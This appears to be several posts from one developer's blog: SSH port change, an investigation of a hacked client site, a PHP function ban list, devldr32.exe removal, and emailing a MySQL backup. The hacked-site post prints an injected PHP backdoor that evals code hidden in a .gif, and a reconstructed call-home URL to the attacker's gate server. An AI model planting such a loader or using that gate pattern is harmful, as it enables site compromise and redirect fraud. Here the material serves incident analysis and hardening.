It’s pretty simple to change the default port:

Just edit the SSH configuration file, normally this will be found in /etc/ssh or /usr/local/etc/ssh.

To change it over, edit the line that reads “Port 22″ or “#Port 22″ to a different port number and then restart SSH.

So before I start this post I think I should make it clear that I am supporting my clients legacy code, which was developed by another developer at least 3-4 years ago. My client is aware of the issues with the code and is actively seeking to patch it up.

So anway, yesterday I got an email from my client at around 3pm showing some rather nasty Google search results with some of his domains listed in them. Naturally I clicked on the links to see what would happen, and sure enough, after being sent to my clients website, I was sent on to some kind of affiliate web page full of pop-ups trying to tell me my machine had a virus and that I should buy the anti-virus software they were selling – I’m sure you’ve all seen the kind of website I’m talking about.

So obviously this is a bit of an emergency, so I stopped what I was doing and started to investigate. I’m still not certain how the attack is being implemented since we’ve not yet managed to discover how the hacker is getting access to the server, hence this being probably the first post in a series, but I’ll tell you what I know.

About a month ago, my client phoned me up saying he had accidentally clicked on a virus in his email, and it had caused major problems on his PC. He told me he was running anti-virus software and cleaning up his machines. Knowing that my client doesn’t have the greatest computer skills I thought “uh oh” this could be bad.

Shortly after this, maybe a week later, my client phones up because one of his clients ecommerce websites (he runs a small web development firm) was redirecting visitors to a web page selling anti-virus software! (sound familiar?). So I took a look around the code and discovered that one of the product names in the database had been changed to include some JavaScript which redirected you immediately to this AV affiliate website.

My first thought was oh no, this means the website has been SQL injected, so I looked through the logs and sure enough there were some requests coming from a bot that was trying to SQL inject. Obviously I patched up the SQL injection vulnerability and nothing else of the issue.

Then, about 2 weeks later, I get another phone call; the websites doing the same thing. So now I know it can’t be SQL injection, which means the hacker either has root access to the server the website(s) are on (more than one has been affected to date), or that the hacker has FTP access, so I instruct my client to change all his FTP usernames and passwords, which he promptly does, and I fix the issues with the code.

Then about 2 weeks more pass by and I get an email entitled “Nightmare!!”, which is kind of where this story begins…

So, as I mentioned above, I visited the website in my browser – looks fine, I am able to browse the shop, I’m not redirected anywhere, but the email from my client has links to this website that definately redirect to the affiliate website in question. So I type the address into my browser including the full URL from my clients email, and sure enough I am redirected to this affiliate website.

The url looked like this:

http://www.clientsdomain.com/index.php?id=50000

So naturally I checked out index.php, and saw the following code:

<?
$browser = CheckBrowser();
$link = $browser ? ‘index.php?id=50000′ : ‘about-us.php’;
$title = $browser ? ‘Blog <font color=#FF0000>(NEW)</font>’ : ‘About us’;
?>
<td height=”26″ align=”center” class=”style51″><a href=”<? echo $link; ?>”><? echo $title; ?></a></td>

Roughly speaking, this code checks the browser, and either displays a link to about-us.php or links off the url above (index.php?id=50000).

Now, that’s interesting, so I needed to know what the php function CheckBrowser() was doing… so I had to hunt around the code (all Object Orientated Code without documentation) and I found the CheckBrowser() function – it was basically testing to see if the request was being made by GoogleBot, or Yahoo. So to test my theory I used the following great little tool ( http://www.web-tool.org/cloak-check/cloak-check.asp ) in conjunction with http://bethebot.com and yep, this website was definitely cloaking.

So then I had to figure out how it was redirecting, index.php didn’t have any code to check for $_GET variables, nor did it include any code to redirect people; strange…

So I took another good look around the code and found the following bit of PHP:

        if(isset($_REQUEST['id']))
        if(($_REQUEST['id']>=50000)&&($_REQUEST['id']<60000))
        {
            $fls = array(array('images/product-display-box_19.gif',3696,21894));
            foreach($fls as $v)
            if(file_exists($v[0]))
            {
                $f=fopen($v[0],'rb');fseek($f,$v[1],SEEK_SET);$d=fread($f,$v[2]);fclose($f);eval($d);megadupa($v[0]);
                break;
            }
            die();
        }

Amusingly, placed immediately preceding my code designed to prevent SQL injection.

Now look at this code, there is a $_GET variable called id, with a value between 50000 and 60000 it opens a file on the server product-display-box_19.gif and reads a specific part of that file and then evals()  whatever it finds (which means it “runs the code”). Now a .gif image shouldn’t be able to be executed, so how does this work? and, what the hell is the megadupa() function, that’s not part of the PHP language, why isn’t this falling over saying that that is bad php.

So the next port of call was to look at product-display-box_19.gif. I checked out the images/ folder on the server and guess what, there is a 19MB file with that very name, now 19MB is HUGE for an image file, so I though I need to see this.

I downloaded it from the server, and double clicked on it – I’m pretty good with PCs so although I knew I might suffer a buffer overlow attack or a trojan, but I’m confident I can handle these things

Well, I loaded up the image and it was a tiny little .gif, it looked like the bottom of a button and would normally be 19 KB  in size not 19 MB! Obviously there is something fishy going on here. So I opened the .gif file using Notepad++, took ages of course, but once it had loaded, I scanned through the code and sure enough this .gif file has been specially crafted and contains loads of PHP, XHTML / CSS the lot, in fact it’s a pretty amazing file.

So I renamed the file to .php and noticing that there were some comments in the embedded PHP instructing me how to run the code without the eval() function stuck it on my local server and voila it loaded! And it didn’t just load anything, it loaded what looked like clones of Wordpress – two of them, loads of sex related keywords, basically this thing looked like it had been used repeatedly to hack servers. What a find.

So being curious I started to trawl through the code, and guess what, this script “phones home”, revealing IP addresses. So I followed them, and ended up on a webserver in the USA, with a message saying that “the service was unavailable”, so I referred back to the code, and noticed that when it “phones home” it also sends back information about the referrer, domain, IP address etc etc so I constructed a fake URL as follows

http://123.123.123.123/gate/gate.php?t=av&s=2&pid=665&uri=www.example.com%2Findex.php&ip=64.22.112.234&ref=&ua=Mozilla%2F5.0+%28compatible%3B+Googlebot%2F2.1%3B+%2Bhttp%3A%2F%2Fwww.google.com%2Fbot.html%29

And, I was in!

Suddenly this server in America sends me back a web address, you guessed it, for the affiliate website.

So now I’m looking at a server which instructs these scripts to point other peoples websites to a URL of the hackers choice! Of course at this stage I whois’ed the IP address and yes I know who is hosting the IP.

So next up, I do a reverse DNS lookup using http://www.myipneighbors.com/ and I find some of the other websites on the server in America. So I visited them, they pretty much all seemed to be spammy fake “search engines” but interestingly they linked back to another IP address – also in America, but on a different host server. So I loaded up the new IP address and was immediately redirected to domain. I’m not going to reveal the domain, but this gave me something else to run a whois check on.

So I did, and the domain resolved to someone in Texas, but even more interestingly, it included an email address for the registrant: @mail.ru

So now I’m looking at a Russian hacker, using a server in America to control what seems to be a number of compromised servers to redirect websites and manipulate search engine results to point to an affiliate website selling anti-virus software.

So, since I still don’t know how this person got into my clients website in the first place, I have instructed him to change his FTP passwords and not to log in again for the time being. I will be contacting the web hosting company and I’m waiting to see if the hacker gets back in again, if they do I can only presume the web host has been compromised.

Look out for part two…

When you install PHP, it doesn’t make a huge amount of recommendations about which functions you should ban on your servers. Although it basically does come out of the box in safe mode, which is great, as a web host trying to offer the best service possible, we like to offer our customers the choice of using PHP’s safe mode or not. I know that as a developer it’s a real pain to be forced to deal with things like magic quotes when you already have tight methods of blocking SQL injection, XSS attacks etc.

So, as a hosting company, we want to leave things as flexible as possible for developers, it’s critical for us to know that our customers can’t write PHP code that could lead to our server being left wide open to attack.

So, being diligent web hosts we searched high and low for a decent list of PHP functions that we ought to ban, and surprisingly couldn’t really find any decent lists.

So, for anyone wondering what functions to ban, here is our list of PHP functions you should definitely not allow your customers to use!

exec, system, passthru, readfile, shell_exec, escapeshellarg, proc_close, proc_open, ini_alter, dl, parse_ini_file, show_source, popen, pclose, pcntl_exec, proc_get_status, proc_nice, proc_terminate, pfsockopen, posix_kill, posix_mkfifo, openlog, syslog, escapeshellcmd, apache_child_terminate, apache_get_env, apache_set_env, apache_note, virtual, error_log, openlog, syslog, readlink, symlink, link, highlight_file, closelog, ftp_exec, posix_setpgid, posix_setuid, posix_setsid, posix_setegid, posix_seteuid, posix_getpwnam, posix_ctermid, posix_uname, posix_getegid, posix_geteuid, posix_getpid, posix_getppid, posix_getpwuid

I’m not going to go into details here, but if you’re in for a fright, look these functions up (especially the posix ones) on the www.php.net website, you’ll be very scared!

This list may be overkill, but keep in mind, we’re aiming this at the shared server market. If anyone has any other functions they think should be banned, please let me know.

Once again, I seem to have found a poorly documented PC problem, funny how I always seem to be getting these…

Anyway, this page is all about how I managed to remove the unbelieveably annoying file devldr32.exe from my Windows XP box. I recently needed to move PCs as my old computer was starting to play up, doing things like not shutting down or starting up properly; you know the kinds of things that happen to Windows PCs after a while.

Since I had a spare PC knocking around, and it had a higher spec than the one I was using I decided to move onto the spare machine and turn my old PC into a proper server for my web development. This basically meant starting from scratch on the spare machine which I promptly did. To cut a long story short, I got it all up and running, got all the device drivers installed and was good to go!

Until I noticed a process running which I didn’t install, and which, quite frankly, I didn’t want running – guess which file! You got it devldr32.exe

So, like I normally do, I killed the processes, checked all the usual places that can cause files to auto start (startup folder, registry, services) and found nothing (or if I did find anything I deleted it, to be honest I can’t remember now).

Then obviously I restarted and, lo-and-behold, there’s that file running again, pretty much laughing at me. So I killed it again and carried on. Then I noticed it running again! How did that happen? I didn’t even restart my machine. So I killed it again and opened my ftp program (for no particular reason) and as I’m watching my process list, it fires itself up again.

So by now I’m starting to think this file must be a virus, so I did my usual Googling and found this:http://www.neuber.com/taskmanager/process/devldr32.exe.html. Cool, useful and everything but no solution, and no clear answer on whether this is a virus or not. But at least it mentioned Creative SoundBlaster drivers, which I thought I had.

Anyway, cutting another longish story short, I searched and searched for ways to remove the stupid thing, including searching the Creative Labs website and everything.

Ultimately though, no matter what I did, I could neither remove the file or find any information about how to remove the file. No I’m not one to let these things get away, so I figured I’d have to solve the problem myself. And, thankfully I manged to, here’s how:

Actually the trick is rather simple, if you’re reading this you’ve probably already read about deleting devldr32.exe from c:\windows\system32\ and if you’ve really been paying attention, to also remove it from c:\windows\system32\dllcache\

That is basically the technique, but since the file seems to be able to load itself from whatever driver you’ve got loaded, simply killing the process and deleting those files doesn’t get rid of the little bugger!

Instead you need to reboot Windows XP into Safe mode, then delete the files. Complete explanation follows:

Solution

1. Restart your PC, as soon as it starts to come back online, start tapping the F8 key furiously, if you get it right, you’ll be presented with the option to load Windows XP in safe mode, choose it using the arrow keys and hit enter.
2. Windows XP will load and look rubbish, log in if you have to and open Windows explorer.
3. Go to C:\windows\system32\ and delete devldr32.exe
4. Now as a precaution, lets remove it from the dll cache.
5. Still in Windows Explorer, click on the ‘Tools’ menu at the top of the window, and select ‘Folder Options’
6. In the window that appears, click the ‘view’ tab.
7. In the advanced settings section, check ‘Show hidden files and folders’ and also uncheck ’hide protected operating system files(Recommended).(Click ok on the warning if you get one)
8. Click OK to get out of the window you were in.
9. You should now be looking at a much longer list in the c:\windows\system32\ folder, if you look closely you should be able to see the \dllcache\ folder.
10. Click on it
11. Find devldr32.exe and delete it.
12. Now restart your machine (in normal mode by not pressing F8 repeatedly)
13. With luck devldr32.exe is gone for good and your soundcard still works nicely (albiet only on 2 speakers).

I don’t know if there really is a virus out their calling itself devldr32.exe, I presume there is, fortunately I didn’t have the virus, I had the genuine file, as you can see even the genuine file was a pain to remove, but I imagine the virus is even harder to get rid of.

I have no idea how to remove the virus as I’ve never had it, but I can point you towards a great free virus scanner:http://www.clamwin.com/ and also a great free Rootkit remover: http://www.sophos.com/products/free-tools/sophos-anti-rootkit.html both come highly recommended by me. But, as always, I’m not responsible if you mess your PC up.

So, as you’ve probably guessed, I figured out how to do it. The answer’s actually very simple, and can easily be run as a cron job to automate the process on a daily basis.

First you need to make your MySQL dump file. (I prefer .sql files as I think it makes things way more transferable)

The command to dump all your data from MySQL is this:

          mysqldump –u username –p databasename > mysqldumpfilename.sql

This will output a copy of your entire database to the file called mysqldumpfilename.sql (of course you can call yours whatever you want)

The next step is to get this file emailed to you. Somewhere (I don’t remember where) I found out that you should encode your mail attachments using the uuencode function in Linux.

So to email yourself a copy of your database backup, the command is as follows:

          uuencode mysqldumpfilename.sql mysqldumpfilename.sql | mail sylvia@home.com

Now just put the two together and you can email yourself a backup of your mysql database.